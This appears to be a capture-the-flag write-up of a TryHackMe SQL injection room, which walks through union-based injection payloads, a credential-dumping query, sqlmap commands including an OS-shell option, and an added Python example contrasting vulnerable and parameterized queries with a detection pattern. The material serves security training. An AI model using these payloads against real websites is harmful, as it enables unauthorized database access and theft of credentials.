SQL Injection Tryhackme Writeup

Shamsher khan
6 min read, May 16, 2021


By Shamsher khan. This is a writeup of the Tryhackme room “SQL Injection”.


Room link: https://tryhackme.com/room/sqlibasics
Note: This room is for Premium Members only (those who purchased a THM premium membership).

SQL Injection Lab Tryhackme Writeup

https://shamsher-khan.medium.com/sql-injection-lab-tryhackme-writeup-96822669c41b

Definition

Union-based SQLi is a SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.

Approach

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:

SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords

This SQL query returns a single result set with two columns, combining the values in the first and second positions from both usernames and passwords.

A UNION SQLi attack consists of three stages:

1. You need to determine the number of columns you can retrieve.

2. You make sure that the columns you found are in a suitable format.

3. Attack and get some interesting data.

> Determining the number of columns required in an SQL injection UNION attack

There are two ways to detect it:

The first one involves injecting a series of ORDER BY queries until an error occurs. For example:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# and so on until an error occurs

(The last value before the error would indicate the number of columns.)

The second one (most effective in my opinion), would involve submitting a series of UNION SELECT payloads with a number of NULL values:

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs

No error = the number of NULLs matches the number of columns.

> Finding columns with a useful data type in an SQL injection UNION attack

Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns (for example, 4), you can probe each column to test whether it can hold string data by replacing one of the NULLs in the UNION SELECT payload with a string value. In the case of 4 columns you would submit:

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

No error = data type is useful for us (string).

> Using an SQL injection UNION attack to retrieve interesting data

When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.

Suppose that:

* The first two steps showed exactly two existing columns with the useful datatype.

* The database contains a table called users with the columns username and password.

(This can be figured out by using the boolean technique from Unit 6)

In this situation, you can retrieve the contents of the users table by submitting the input:

' UNION SELECT username, password FROM users --
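As an added example (not part of the original writeup), the Python below models the room's search page with SQLite standing in for its MySQL backend: a concatenated query that the page's stage 1 and stage 3 payloads work against, the parameterized query that defeats them, and a simple check a defender could run over logged search terms. The schema, product rows and credentials are constructed, and the room's `-- //` comment quirk is not modelled.

```python
import re
import sqlite3

# Constructed sample data (not the room's database): a five-column products
# table, matching the room's column count, and the users table the text names.
SCHEMA = """
CREATE TABLE products(id INTEGER, name TEXT, description TEXT, price REAL, category TEXT);
INSERT INTO products VALUES (1, 'Widget', 'A basic widget', 9.99, 'tools');
INSERT INTO products VALUES (2, 'Gadget', 'A shiny gadget', 19.99, 'toys');
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('alice', 'hunter2');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def search_vulnerable(conn, term):
    # Developer mistake: the term is pasted into the SQL, so a quote closes the string.
    sql = ("SELECT id, name, description, price, category FROM products "
           f"WHERE name LIKE '%{term}%'")
    return conn.execute(sql).fetchall()

def search_safe(conn, term):
    # Fix: a bound parameter is always data, so the UNION payload is just an unmatched string.
    sql = ("SELECT id, name, description, price, category FROM products "
           "WHERE name LIKE ?")
    return conn.execute(sql, (f"%{term}%",)).fetchall()

def probe_column_count(search, max_cols=10):
    # Stage 1 from the text: add NULLs until the UNION stops raising a column-count error.
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + " -- "
        try:
            search(payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None

def dump_users_payload():
    # Stage 3 from the text, padded with NULLs to the five-column count.
    return "' UNION SELECT username, password, NULL, NULL, NULL FROM users -- "

def looks_like_union_probe(value):
    # Defender's view: the same payloads are easy to flag in request logs or a WAF rule.
    return re.search(r"(?i)\bunion\b\s+(all\s+)?select\b", value) is not None
```

Against `search_vulnerable` the probe stops at 5 and the stage 3 payload returns the users row; against `search_safe` the same input simply matches no product.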

Practice

Go ahead and deploy the provided machine at the beginning of the task. Browse to 10.10.208.189:3000

The provided lab is a small, highly vulnerable web application with a lot of misconfigurations and developer mistakes.

First, browse to 10.10.208.189:3000/resetdb.php to set up the database.
Then, go to 10.10.208.189:3000/register.php and register a new account. Make sure you input something interesting, as you'll be able to interact with that data later on! (Question 4)

Now let’s proceed to the main objective: exploiting the web app. A vulnerable search field is located at 10.10.208.189:3000/searchproducts.php

Let’s start our exploitation process!

As you might remember, we first need to determine the number of available columns by inputting a series of
' UNION SELECT NULL -- payloads into the search field.
To spice things up, I've configured the database to also throw an error when there is a -- at the end. To bypass that, we need to include an additional comment after the --. You can use either // or /* to bypass that configuration.

As you can see in the screenshot above, a single NULL value causes an error, meaning that there are more columns. Keep adding NULL values until you finally get the number. Note it down to answer the questions later on.

' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //

Question 1.How many columns are being returned by the query?

Answer: 5

Now, try replacing each NULL value in turn with ‘a’ and see if there’s an error. An error indicates that the given column format is not suitable for us and cannot be exploited.

Question 2. How many of these columns can accept strings? (‘a’)

' UNION SELECT NULL,NULL,NULL,NULL,'a' -- //
' UNION SELECT NULL,NULL,NULL,'a',NULL -- //
' UNION SELECT NULL,NULL,'a',NULL,NULL -- //
' UNION SELECT NULL,'a',NULL,NULL,NULL -- //
' UNION SELECT 'a',NULL,NULL,NULL,NULL -- //

Answer: 5

Finally, we can start getting some valuable information. Simply replace some null values with SQL keywords to get information about the database.
Here’s a small list of things you’d want to retrieve:

1. database()

2. user()

3. @@version

4. username

5. password

6. table_name

7. column_name

Use the database() to answer Question 3.

Question 3. What’s the database name?

' UNION SELECT NULL,database(),NULL,NULL,NULL -- //

Answer: sqlitraining

Task 8. Automating exploitation

Question 1. How would you get an OS shell on website “sqli.thm/login.php”? (URL switch comes first)

Answer: sqlmap -u sqli.thm/login.php --os-shell

Question 2. What about listing all databases on the same website? (URL switch comes first)

Answer: sqlmap -u sqli.thm/login.php --dbs

1. https://portswigger.net/web-security/sql-injection

2. https://github.com/Audi-1/sqli-labs

3. https://github.com/appsecco/sqlinjection-training-app

4. https://tryhackme.com/room/gamezone

5. https://tryhackme.com/room/avengers

6. https://tryhackme.com/room/uopeasy

7. https://tryhackme.com/room/jurassicpark

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthroughs:

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

Written by Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer
